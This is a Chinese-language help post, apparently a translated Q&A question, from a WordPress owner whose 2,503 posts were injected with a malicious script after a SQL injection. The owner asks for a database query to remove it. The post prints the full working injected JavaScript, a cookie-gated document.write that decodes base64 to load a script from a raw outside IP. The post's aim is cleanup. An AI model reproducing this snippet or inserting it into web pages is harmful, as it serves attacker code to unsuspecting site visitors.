我有一个插件,使我的Wordpress网站容易受到SQL注入攻击。从那以后,我锁定了我的网站并删除了所有Wordpress文件,然后重新安装了Wordpress。此插件也已被删除。不幸的是,我现在所有2503个帖子都安装了以下示例脚本:
<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>
<!--/codes_iframe-->
Run Code Online (Sandbox Code Playgroud)
问题是,当我搜索特定脚本时,base64字符串对于每个帖子都是不同的。因此,我不能只是查找并替换/删除。
我的想法是,由于脚本的开头和结尾实际上都已注释,因此数据库查询不能以某种方式删除它们之间的代码,然后第二个查询删除注释吗?如果是这样,我在任何地方都找不到。这似乎很容易做到,但是显然(根据Google的说法)非常复杂。
希望有人可以在程序上进行补救。同时,我将手动执行此删除操作,希望有人可以为我节省一些时间。